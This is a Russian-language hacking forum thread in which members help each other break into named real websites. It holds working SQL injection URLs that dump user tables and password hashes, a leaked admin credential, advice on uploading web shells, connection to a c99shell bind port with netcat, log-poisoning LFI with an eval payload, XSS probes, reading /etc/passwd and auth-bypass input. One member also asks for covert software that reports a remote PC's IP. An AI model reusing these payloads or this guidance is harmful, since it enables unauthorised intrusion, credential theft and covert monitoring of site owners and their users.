вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?

noviyuser said:
Подскажите мужики как обойти фильтрацию FROM в sql injection
Хостинг на SpaceWeb


Насколько я помню, там фильтруется последовательность union select from, обходится POST'ом, если скрипт его принимает, либо подзапросы.

Drakula208 said:
вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?


попроси админа что бы дал тебе доступ по ssh..и тогда заходи..из пхпинфо слово инфо тебе о чем нибудь говорит? информация тебе поможет если ты нашел скуль и имеешь файл_прив ..либо инклюд..

вот такая проблема:

http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28s elect+count%280%20%29,concat%28%28select%20count%2 8*%29%20from%20user%29,floor%28rand%280%29*2%29%29 +from%20+information_schema.tables+group+by+2+limi t+1%29a%29

выдает количество юзеров в таблице user

Message: Can't execute query: Duplicate entry '17661' for key 1

но вот при выводе полей пишет ошибку:

http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28s elect+count%280%20%29,concat%28%28select%20mail%20 from%20user+limit+1,1%29,floor%28rand%280%29*2%29% 29+from%20+information_schema.tables+group+by+2+li mit+1%29a%29

Message: Can't execute query: Unknown column 'table_name' in 'field list'

в чем может быть проблема?

Code:
http://www.uk121.com/events_view.php?eid=(select*from+(select+name_cons t((select+mail+from+user+limit+1),1),name_const((s elect+mail+from+user+limit+1),1))a)

Seravin said:

Code:
http://www.uk121.com/events_view.php?eid=(select*from+select+name_const ((select+mail+from+user+limit+1),1),name_const((se lect+mail+from+user+limit+1),1))a)



так все равно вывода нет

скобку пропустил. исправил

Seravin, спасибо большое

http://xxxx.net/1'/


поставил кавычку

вылезло


SQL Error (1064): You have an error i*n your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''302'' ORDER BY pid' at line 1 i*n query "SELECT dir, title as title, id, pid, hiddenLink, cod FROM catalogue WHERE dir='1'' ORDER BY pid" in xxx/xxx/xxx.php on line 1


получается


http://xxxx.net/?id=1 равно http://xxxx.net/1/


правильно ли я составил?

что ты составил? ты просто сделал то что делает .htaccess

Seravin said:
что ты составил? ты просто сделал то что делает .htaccess


http://xxxx.net/?id=1 при этом запросе не отображает ту страницу которая была при http://xxxx.net/1/

в этом смысле имел ввиду

логично что не правильно?

Seravin said:
логично что не правильно?


какой запрос составить чтобы отображало ту же страницу как и при http://xxxx.net/1/

http://xxxx.net/index.php?dir=1

или

http://xxxx.net/?pid=1

1) а нам то как узнать?

2) а зачем ты это делаешь? ты скулю расскрутить не можешь при http://xxxx.net/1/ ?

Seravin said:
1) а нам то как узнать?
2) а зачем ты это делаешь? ты скулю расскрутить не можешь при http://xxxx.net/1/ ?


точно не знаю как делать при таком виде, можешь подсказать примерчик

а чем он отличается от обычной скули?

http://xxxx.net/1+and+1=2+union+select+1,2,3,4,5,6+--+/

мда уж, для тех кто в танке id=1 равно с /1/ , id=1+union+select+bla bla bla,...../1+union+select+bla bla bla

mysql 5 версия


-1+union+Select+1,2,3,4,5,6,7+from+table1.ibf_membe rs+--+


выводимые поля 2 и 3

не выводит


-1+union+Select+1,password,3,4,5,6,7+from+table1.ib f_members+--+


не выводит


-1+union+Select+1,unhex(hex(password)),3,4,5,6,7+fr om+table1.ibf_members+--+




-1+union+Select+1,aes_decrypt(aes_encrypt(password) ),3,4,5,6,7+from+table1.ibf_members+--+


тоже не выводит

group_concat, concat пробовал

из другой любой кроме ibf_members выводит данные, как обойти?

мб написать count(password) и увидеть 0? если всё таки с group_concat не прокатило

Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?

Modex said:
Есть сайтик www.mirdoors.ru на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?


я так понимаю что шeлл у тебя там есть , если ты предлагаешь порутать , и если порутать то давай в студию uname -a

Modex said:
Есть сайтик, на сервере лежит еще 27 разных сайтов, требуется как нить порутать сервак , нашел на 4 сайтах SQL,и file_priv нету, что можно сделать ?


Через админку заливайся, раз прав нет.

Как зальешься, тебе сюда /thread235697.html

в SQLI Helper - Blind Dump есть поле Keyword True что оно означает и что нужно туда писать, для Joomla например

Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,

например

http://site/bug?id=1 (в титле выводит "Article 1")

http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")

http://site/bug?id=1+and+1=0 (в титле ничего не выводит)

тогда в этом случае слово "Article 1" будет значением для Keyword

Expl0ited said:
Вообще в софте подобного рода поле Keyword обозначает слово, которое возвращается из запроса в случае TRUE и в случае FALSE,
например
http://site/bug?id=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=1 (в титле выводит "Article 1")
http://site/bug?id=1+and+1=0 (в титле ничего не выводит)
тогда в этом случае слово "Article 1" будет значением для Keyword


А обязательно в титле брать значени Keyword-а

или можно любое значение которое исчезает на странице?

Необязательно, значение Keyword это выводимые из БД данные

Вообщем наковырял паролей (хешей),но они все вот такиесайт пакистанский)

superadmin:С/FSсЅБvрЛґЈѓЊУN$Ї

А подробнее?

Чем наковырял, откуда, каким образом?

Expl0ited said:
А подробнее?
Чем наковырял, откуда, каким образом?


Прогой Havij

попробуй unhex(hex(column-name))

http://www.mirdoors.ru/login.php?link= А возможно ли тут что то сделать ?

Expl0ited said:
попробуй unhex(hex(column-name))


Так базу найти не может.

Cannot get current db name!

Modex said:
http://www.mirdoors.ru/login.php?link= А возможно ли тут что то сделать ?


да, можно..введи логин и пароль

valyka80 said:
Так базу найти не может.
Cannot get current db name!


давай ссыль в студию, а то так гадать будем до 2012 когда мир рухнет и настанет конец света.

Gorev said:
давай ссыль в студию, а то так гадать будем до 2012 когда мир рухнет и настанет конец света.


http://www.senatedefencecommittee.pk/new_subsection.php?ssid=30

Если получиться отпишитесь как.

valyka80 said:
http://www.senatedefencecommittee.pk/new_subsection.php?ssid=30
Если получиться отпишитесь как.


http://www.senatedefencecommittee.pk/new_subsection.php?ssid=-1%20union%20select%201,2,version(),4,5--

Фараон said:
http://www.senatedefencecommittee.pk/new_subsection.php?ssid=-1%20union%20select%201,2,version(),4,5--


Мне это не надо.

valyka80 said:
Мне это не надо.


А что тебе нужно? не совсем понял.

Фараон said:
А что тебе нужно? не совсем понял.


Выше топик

/threadnav46016-1611-10.html

Modex said:
http://www.mirdoors.ru/login.php?link= А возможно ли тут что то сделать ?


Смотря что нужно?Ковычки там слешатся.Вот хсс отакэ можно http://www.mirdoors.ru/login.php?link=">alert('собери портфель на завтро')


valyka80 said:
Так базу найти не может.
Cannot get current db name!


Незнаю как ты там делал,но запрос с выводом проходит,правда это не поможет=\

Доброго времени суток.Посоветуйте хороший sql инжектор, помимо хавия и sqlhelper.Спасибо.)

Незнаю как ты там делал,но запрос с выводом проходит,правда это не поможет=\


Да все у меня получилось пароли абра-када-бра.

valyka80 said:
Незнаю как ты там делал,но запрос с выводом проходит,правда это не поможет=
Да все у меня получилось пароли абра-када-бра.


ну смотри, я думаю там пассы в откытом виде а не хеши..так как есть одна запись с цифровым пассом faran:123 , думаю что пассы просто арабской вязью написанны..и таким образом они выводится правильно не будут, сервак на винде .... честно сказать я не знаю что делать

Gorev said:
ну смотри, я думаю там пассы в откытом виде а не хеши..так как есть одна запись с цифровым пассом faran:123 , думаю что пассы просто арабской вязью написанны..и таким образом они выводится правильно не будут, сервак на винде .... честно сказать я не знаю что делать


В двух пасах двоеточие стоит

ѼЕ*?ВЁ1½îî:FВђВ°вЂ*Вё 2¥›ÞìgæXgГ†q

типа соль у них же с права на лево пишеться

ну не ставить же арабский языковый пакет

привет всем!

У меня вполне безобидная просьба

есть сайт - fansubs.ru

я с него хочу слить все файлы субтитров

вроде бы все там очевидно, нужно только по ссылкам вида fansubs.ru/base.php?srt=1 пройтись, но у них какая то защита теперь стоит и только при передаче данных из формы загрузка начинается.

причем, если отправлять форму с помощью жабаскрипта в цикле, то тоже выдается страничка, а не файл.

есть какие нибудь идеи по этому?

valyka80 said:
В двух пасах двоеточие стоит
ѼЕ*?ВЁ1½îî
:
FВђВ°вЂ*Вё2¥›ÞìgæXg Г†q
типа соль у них же с права на лево пишеться
ну не ставить же арабский языковый пакет


М.б. попробывать поиграться с кодировкой?


.while said:
Доброго времени суток.Посоветуйте хороший sql инжектор, помимо хавия и sqlhelper.Спасибо.)


Лучший инжектор- собственные руки.

Из автоматических- SQLi Helper.

мб всё таки тулза лучше чем sql helper?

Да да да, про нее забыл опять.

В скрипте не отображается левая скобка "", она заменяется на > и текст который идет после неё отображается нормально.

Других фильтров не заметил.

Как выполнить js код?

AnGeI, попробуй вместо %3e

буду смотреть закрепленные темы, прежде чем задавать вопросы (https://antichat.live/threads/235697/)

PvgValo said:
AnGeI
, попробуй вместо %3e


Не выполняется, выводится:


Code:
%3cscript%3ealert(1);%3c/script%3e

Seravin said:

Code:
http://www.uk121.com/events_view.php?eid=(select*from+(select+name_cons t((select+mail+from+user+limit+1),1),name_const((s elect+mail+from+user+limit+1),1))a)



а вот если организовать дампинг инфы через лимит, то на запросах limit+1000,1 сервак уходит в даун

попробую ка я вывод через user_id

он не уходит в даун, браузер в header менять надо, он типа банит или что. А типа банит после того как ты обращаешься к строке которой несуществует. предпологаю что 1000 строки просто нет

/////

https://forum.antichat.net/threadedpost2518327.html

Помогите подобрать количество полей

bratsk.org/news.html?page=-1

Lastman said:
Помогите подобрать количество полей
bratsk.org/news.html?page=-1


Нет там ничего..

http://oldtitan.ja.org/challenge.php?page=rules&id=1'+order+by+47+--+

http://oldtitan.ja.org/challenge.php?page=rules&id=1'+union+all+select+null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+users+--+

не получается для

http://oldtitan.ja.org/area_admin.php?=id3

плз хэлп, возможно ли что нить сделать?

Всем привет!

На сайте получил возможность добавлять/изменять новости... возможно ли при помощи js(или еще чего) перехватить какнить вводимые логин и пасс из формы входа???

Куки в принципе не интересуют! ..нужен сам пасс, мб к мылу подойдет и т.п.

tapapax said:
Привет. Столкнулся с проблемой: не могу раскрутить инъекцию, т.к. на серве стоит 3й(!!!) мускуль (3.23.55), а как я понял, union'ом там еще не пахло. Попробовал также вложенный запрос, не сработал. Есть ли другие варианты?


http://www.securitylab.ru/contest/212101.php

https://rdot.org/forum/showthread.php?t=32

https://rdot.org/forum/showthread.php?t=503

вот еще накапал...

http://oldtitan.ja.org/challenge.php?page=rules&id=22'+union+all+select+1,2,3,'str1','str2',null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull+from+INFORMATION_SCHEMA.COLUMNS+--+

http://oldtitan.ja.org/area_admin.php?=id3 без успеха...

http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf"

помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал.

В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .

GIG said:
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .


в форумах я ищу название форумов и топиков, потом по гуглу ищу, в других кмс таким же макаром ищу что нибудь индивидуальное для сайта что бы ссузить список поиска, еще вывожу мыло админа, часто мыла на том же домене что и сайт...вариантов много...

а есть у кого нить пособие как искать и с чего начинать при поиске XSS

GIG said:
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .


/showthread.php?p=2343252


viziter-msk said:
а есть у кого нить пособие как искать и с чего начинать при поиске XSS


какие способы хочешь? в статях все нормально написано и описано.. если не понял- читай еще раз

не понимаю я вас...

как подобные скули крутить? и чем вызвано сиё странное поведение?

http://gyazo.com/d84974dd14cbee725b4ad88ca36e32f8.png

http://www.razda4a.ru/?news=12+order+by+5--

zlo12

http://www.razda4a.ru/?news=12;select+version()::int-- 1

кодировку нынче не умеют менять? Koi8-R

zlo12 said:
как подобные скули крутить? и чем вызвано сиё странное поведение?
http://gyazo.com/d84974dd14cbee725b4ad88ca36e32f8.png
http://www.razda4a.ru/?news=12+order+by+5--


PostgreSQL

тупанул, спасибо ^_^

Подскажите в веб шелл есть Binding port:

Открыл доступ говорит

Binding... ok! Connect to :123123! You should use NetCat©, run "nc -v 123123"!

Как его заюзать если линукса нету (винда) и по какому ip адресу коннектится? (по имени домена?)

noviyuser said:
Подскажите в веб шелл есть Binding port:
Открыл доступ говорит
Binding... ok! Connect to :123123! You should use NetCat©, run "nc -v 123123"!
Как его заюзать если линукса нету (винда) и по какому ip адресу коннектится? (по имени домена?)


качай неткат для винды, каннект можно делать или к серверному IP или к домену.

nc -v xxx.com 123123

xxx.com [xxx.xxx.xxx.xxxx] 123123 (?): connection refused

nc -v xxx.com:123123

xxx.com:123123: forward host lookup failed: h_errno 11004: NO_DATA

подскажите как его использовать если можно примерчик, там еще пасс есть, что я делаю не так?

noviyuser said:
nc -v xxx.com 123123
xxx.com [xxx.xxx.xxx.xxxx] 123123 (?): connection refused
nc -v xxx.com:123123
xxx.com:123123: forward host lookup failed: h_errno 11004: NO_DATA
подскажите как его использовать если можно примерчик, там еще пасс есть, что я делаю не так?


nc 127.0.0.1 22

nc [IP] пробель [port]

Konqi said:
nc 127.0.0.1 22
nc [IP] пробель [port]


все понял надо было через Using С, а я делал через Using Perl

welcome to c99shell

/bin/bash: not found

в веб шелл напечатал

echo $PATH

вышло

/sbin:/bin:/usr/sbin:/usr/bin

подскажите что сделать?

noviyuser said:
все понял надо было через Using С, а я делал через Using Perl
welcome to c99shell
/bin/bash: not found
в веб шелл напечатал
echo $PATH
вышло
/sbin:/bin:/usr/sbin:/usr/bin
подскажите что сделать?


я чо то не понимаю тебя, ты откуда запускаеш неткат?

шелл то тут причем, открыл порт через шелл, щас забудь о шелле , открой неткат и каннектись

Konqi said:
я чо то не понимаю тебя, ты откуда запускаеш неткат?
шелл то тут причем, открыл порт через шелл, щас забудь о шелле , открой неткат и каннектись


Так и сделал все отлично законнектилось (попросил пасс, ввел его) дальше пишет

welcome to c99shell

/bin/bash: not found

на винде в консоле которую nc запускал и дальше висит

Через Back connection: пришлось делать спасибо большое за ответы

http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf"

помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал. Помогите пожалуйста, посмотрите что можна сделать!

pirat0

Ну если не знаешь о чем ошибка,то вбей ее в гугл или религия не позволяет?

Двиг скачал бы,а не фигней страдал=\

src/damagetypes.php


PHP:


src/include/functions_common.php


PHP:


src/include/functions_db.php


PHP:


Кароче там надо разбираться,желания у меня нету,но запрос с ковычками у тебя уже точно не пройдет,т.к. даже если мг=офф,то еддслешес.

А сама ошибка вызвана кодировками.

~d0s~ спс буду разбиратса, но чувствую врятли что то у меня получитса((, может подскажеш что куда нада тыкать (ну в смисле не в глобальном плане "юзай гугл")

Как пользоваться php-иньекциями в Windows? Какие стандартные пут к файлам чтоб заполучить доступ?

Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия 5.1.44-community-log


Code:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
PAGE_COUNTER
answer
klimat
klimat0001
poll
poll_ip
poll_main
poll_topics
jos_banner
jos_bannerclient
jos_bannertrack
jos_categories
jos_components
jos_contact_details
jos_content
jos_content_frontpage
jos_content_rating
jos_core_acl_aro
jos_core_acl_aro_groups
jos_core_acl_aro_map
jos_core_acl_aro_sections
jos_core_acl_groups_aro_map
jos_core_log_items
jos_core_log_searches
jos_csvi_configuration
jos_csvi_templates
jos_easypart
jos_easypart_badwords
jos_groups
jos_jce_extensions
jos_jce_groups
jos_jce_plugins
jos_jp_exclusion
jos_jp_inclusion
jos_jp_profiles
jos_jp_registry
jos_jp_stats
jos_jp_temp
jos_liex_id_linker
jos_linkexchange_categ

Skipp said:
Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия
5.1.44-community-log


да ничего полезного там, всякая ненужная мелочь вроде логина-пароля от админки джумлы в таблице jos_users

Skipp said:
Подскажите, попадаются такого вида таблицы. В них есть что-нибудь полезное, или нет. Версия
5.1.44-community-log


ti pomoemu group_concat() zdelal..i group_concat() ne vidaet bolse 1024 simvolov..zdelay concat() s limit-om..

i u tebya tam kajetsya joomla..tam dlya tebe est tablica kotoriy group_concat() virezal : jos_users

//транслитом не писать!, предупреждаю.

Я получил колонки из jos_users


id:name:username:email: password:usertype:block:sendEmail:gid:registerDate :lastvisitDate:activation: params


Но информация из username и password не выводится, в чём причина?

Пишет ошибку


Invalid query "select * from klimat where id=2654 and 1=0 union select 1,2,3,4,5,6,7,8,group_concat(concat_ws(0x3a3a3a,us er name,password) separator 0x0b),10,11,12,13,14,15,16,17,18,19,20 from jos_users limit 0,20-- "




http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+jos_users+limit+0,1--+


И так не выводит


http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,group_concat(concat_ws(0x3a3a3a,user name,password)+separator+0x0b),10,11,12,13,14,15,1 6,17,18,19,20+from+jos_users+limit+0,20--+

Skipp said:
Я получил колонки из jos_users
Но информация из username и password не выводится, в чём причина?
Пишет ошибку
И так не выводит


я не буду говорить как, дам наводку, там 3 базы..

belklimat

bestshop_bestshop

bestshop_plenki

чуешь?

Skipp ,

http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+imya bd.jos_users+limit+0,1--+

xarko_v По твоему способу тоже не выводит.

Я уже пробовал по разному:


http://***.ru/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,username,password,10,11,12,13,14,15, 16,17,18,19,20+from+bestshop_belklimat (здесь все базы пробовал подставлять)+where+table_name=jos_users (также имя таблицы подставлял в HEX)+limit+0,1--+




Gorev said:
я не буду говорить как, дам наводку, там 3 базы..
belklimat
bestshop_bestshop
bestshop_plenki
чуешь?


Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от xarko_v и в свой выше указанный. Что ещё посоветуете?

Skipp said:
xarko_v
По твоему способу тоже не выводит.
Я уже пробовал по разному:
Команда database() говорит что я работаю с БД bestshop_belklimat. Пробовал подставлять все базы по очереди и в запрос от
xarko_v
и в свой выше указанный. Что ещё посоветуете?


да там уже шеллов как граблей наверное на твоем сайте...пасс сбрутили уже давно

http://www.belklimat.by/catalog.php?productid=2654+and+1=0+union+select+1, 2,3,4,5,6,7,8,concat%28username,0x3a,password%29,1 0,11,12,13,14,15,%2016,17,18,19,20+from+bestshop_b estshop.jos_users+limit+0,1--+

вот готовый запрос для хэша и логина

чтоб в следующий раз такие вопросы не задавать, хоть примерно пойми синтаксис запросов и статьи повнимательней почитай

Спасибо, приму во внимание.

А как можно узнать количество и имена БД?

Skipp said:
А как можно узнать количество и имена БД?



а когда вы начнете читать? =\

group_concat(schema_name) from information_schema.schemata

кол.во - count(schema_name) from information_schema.schemata

нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет:

Не удалось выполнить запрос!

подскажите какие еще запросы есть наподобие (' or 1=1)

noviyuser said:
нашел на одном сайте при вводе логина и пасса ставлю кавычку (') пишет:
Не удалось выполнить запрос!
подскажите какие еще запросы есть наподобие (' or 1=1)


Рекомендую читать мануалы по иньекциям(см. раздел Статьи), хотя имхо иньекция в авторизации сейчас большая редкость. Если коротко в данном случае я бы рекомендовал использовать что-то типа Admin'+--+ где Admin - логин администратора а комментарий -- отсекает проверку пароля. Возможно после кавычки надо будет добавить закрывающую скобку, возможно не одну. И если кавычка реально работает то вместо комментария -- скорее всего можно использовать /* если речь идет о mysql.

Теперь мой вопрос:

Столкнулся со слепой иньекцией типа union+select+555+--+, ошибка не выводится, но выводится название товара с id=555. Товаров достаточно много, так что теоретически существует возможность создать словарик соответствий выводимого названия товара и инжектируемого айди. После чего уже быстро получать значение нужной переменной, ибо на один символ будет приходиться один запрос.

Вопрос в том, существуют ли уже какие-то тулзы для автоматизации этого процесса и если нету, то есть ли в такой тулзе необходимость ибо руки не из жопу растут, могу и написать.

В принципе согласен можно и не заморачиваться и стандартными методами blind раскручивать, но это не интересно и кроме в моем случае кое-какие символы фильтруются и проги эту иньекцию не кушают.

загрузил файл /etc/passwd через sql injection

(и дальше наподобие)

#loginass:1002:65533::0:0::/var/www/xxx.xxx.com:/usr/local/bin/bash

#login1ass1:1000:1000::0:0:user1:/home/alx:/sbin/nologin

получается login и pass от домена xxx.xxx.com/admin ?

blabla:*:1001:65533:ftp-access to xxx.xxx.net:/var/www/xxx.xxx.net/docs:/sbin/nologin

а это что значит? какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы

noviyuser said:
какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы


/thread49775-config+files.html

noviyuser said:
загрузил файл /etc/passwd через sql injection
(и дальше наподобие)
#login
ass:1002:65533::0:0::/var/www/xxx.xxx.com:/usr/local/bin/bash
#login1
ass1:1000:1000::0:0:user1:/home/alx:/sbin/nologin
получается login и pass от домена xxx.xxx.com/admin ?
blabla:*:1001:65533:ftp-access to xxx.xxx.net:/var/www/xxx.xxx.net/docs:/sbin/nologin
а это что значит? какие еще значения можно загрузить через load file() имею ввиду конфигурационные файлы


блин, и сколько будет продолжатся античатопедия?

никакого пароля там нет, мб лучше немного изучать никсы?

структура /etc/passwd

usernameassword(пусто):uid:gid:comments:home dir:shell

есть ли прога которой можно сдампить много баз? а то sqli helper и mysqli dumper по одной базе приходиться дампить

Почему таким запросом находит кол-во полей


http://www.dknews.kz/article.php?id=4353&archid=115+group+by+5+--+


А при нахождении выводного поля получается всегда ошибка?


http://www.dknews.kz/article.php?id=4353&archid=115+and+1=0+union+select+1,2,3,4,5--+

http://www.dknews.kz/article.php?id=4353+and+1=2+union+select+version() ,2222,3333+--+

смотри тайтл

З.Ы. а если хочешь понять почему в твоём варианте не отображало, то попробуй написать http://www.dknews.kz/article.php?id=4353&archid=115+and+1=0+union+select+11111,2222,3333,44 44,5555--+ и увидишь "Архивные данные за 22 Января 3333 года"

Достал из БД 5.0.51a-24+lenny2-log пароль admina подскажите какой алгоритм шифрования?

admin:adhEqiFPgCuTo

noname:notE52y2N6MfM

Skipp said:
Достал из БД
5.0.51a-24+lenny2-log
пароль admina подскажите какой алгоритм шифрования?
admin:adhEqiFPgCuTo
noname:notE52y2N6MfM


DES(UNIX)

читаем /thread155032.html

подскажите как тут http://redbox.sg/products.php?cat_id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18-- залить шелл, пробовал как написано в статьях и ничего не получается

Code:
http://redbox.sg/products.php ?cat_id=-61+union+select+1,2,3,concat(user_name,0x3a,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user--

redbox_admin:hooyinting

Ищешь админку, заливаешь шелл)

Помогите пожалуйста раскрутить LFI!

Вариант с /proc/self/environ не прокатывает, ибо FreeBSD. Отыскал место хранения логов error_log и access_log. Прочитал все что нашел по LFI, в том числе статью уважаемого Expl0ited'a (https://forum.antichat.net/thread232773.html), но никак пока не получается. Отправляю запрос подключившись через телнет вида:

POST http://site.com/epicfaaaaaail.php HTTP/1.1

Смотрю в access_log:

[23/Jan/2011:12:33:40 -0800] "POST http://site.com/epicfaaaaaail.php

Parse error: syntax error, unexpected $end in /usr/local/apache/logs/site.com-access_log(139780) : eval()'d code on line 1

HTTP/1.1" 404 219

Отправляю по другому:

GET / HTTP/1.1

А там:

[23/Jan/2011:12:25:19 -0800] POST / HTTP/1.1" 200 5346

Третий сделал как в статье:

GET http://site.com/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1

В логе:

[23/Jan/2011:12:25:19 -0800] "GET http://site.com/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1 " 404 215

И еще стопиццотыщ вариантов...

В итоге не access_log&cmd=ls, не access_log&cmd=phpinfo(); не работают...

Что можно еще применить?

Что можете подсказать для того что бы при каждой смене IP на удаленном компьютере. Мне на хостинг (а лучше е-мейл) приходил отчет о том под каким IP сейчас работает ПК.

Естественно надо что бы пользователь удаленной машины не знал об этом.

Как залить шелл в xbtit?

Chest3r

Попробуй вставить php код в User-Agent,в логах он тоже записывается.

Fooog said:
Что можете подсказать для того что бы при каждой смене IP на удаленном компьютере. Мне на хостинг (а лучше е-мейл) приходил отчет о том под каким IP сейчас работает ПК.
Естественно надо что бы пользователь удаленной машины не знал об этом.


Как то мне тоже нужно было нечто подобное, я заюзал xStarter (http://www.xstarter.com/rus/index.html). Отличная штука. Но я настроил ее чтобы она посылала IP-адрес мне на аську, думаю и отправка на мыло должна быть. Все работало четко. Проверено.


TreV@N said:
Chest3r
Попробуй вставить php код в User-Agent,в логах он тоже записывается.


Да если бы, я б с удовольствием воспользовался... Я же логи вижу полностью, и access и error, ничего подобного типа юзер-агента там нет. Только айпишник, дата и урл...

Подскажите что за база такая? Кто нибудь сталкивался с таким? Как его можно использовать?


Database : ftpusers
Table : admin
Password:
pass




Database : ftpusers
Table : users
Password:Uid:Comment:Status:
pass1:65534::1:
pass2:65534:Ftp user (for example):1:


фтп-шник Pure-FTPd FTP server

при подсоединении показывает приветствие

пробовал через Load File делать /etc/pureftpd.passwd не получилось

Как то мне тоже нужно было нечто подобное, я заюзал xStarter. Отличная штука. Но я настроил ее чтобы она посылала IP-адрес мне на аську, думаю и отправка на мыло должна быть. Все работало четко. Проверено.




Естественно надо что бы пользователь удаленной машины не знал об этом.


А там к сожалению палевный значок в трее.

Имхо, это как то скрыть можно. Но закачивать кучу софта на удаленный комп, не оптимальный вариант.

Помогите пожалуйста раскрутить SQL иньекцию:

http://www.citi zens hip.ru/index.php?art=233

вроде как 8 полей.

Заранее благодарен.

Снова вопрос, так говорит что 4 поля


http://ranak.by/news_comm.php?id=2606+group+by+4--+


А так-ошибка...


http://ranak.by/news_comm.php?id=2606+and+1=0+union+select+1,2,3,4--+


Или то просто нет выводного поля?

Skipp said:
Снова вопрос, так говорит что 4 поля
А так-ошибка...
Или то просто нет выводного поля?


http://ranak.by/news.php?id=-2608+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user()),4,5+--+

4.0.24_Debian-10sarge1-log:ranakby:ranakby@localhost

мдя уж.... голова для того что бы дождь в шею не лил?

X-Boson said:
Помогите пожалуйста раскрутить SQL иньекцию:
http://www.citi zens hip.ru/index.php?art=233
вроде как 8 полей.
Заранее благодарен.


крути как слепую

скажу одно, сайт на мастерхосте, админка если она есть(я не искал) скорее всего на бейсик авторизации, залить шелл через форум или блог если есть..и если зальешь шелл , увeряю прав там немного будет..

Никак не могу понять как здесь код sql написть


http://zhlondon.by/index.php?option=com_phocagallery&view=categories&Itemid=
http://www.reporter.tj/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=65
http://www.acfpl.org/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=

http://www.exploit-db.com/exploits/15827/

Netcat CMS

-1+union+select+1,user_id+from+User+--+ показывает

-1+union+select+1,unhex(hex(password))+from+User+--+ показывает

-1+union+select+1,password+from+User+--+ показывает

-1+union+select+1,login+from+User+--+ НЕ показывает

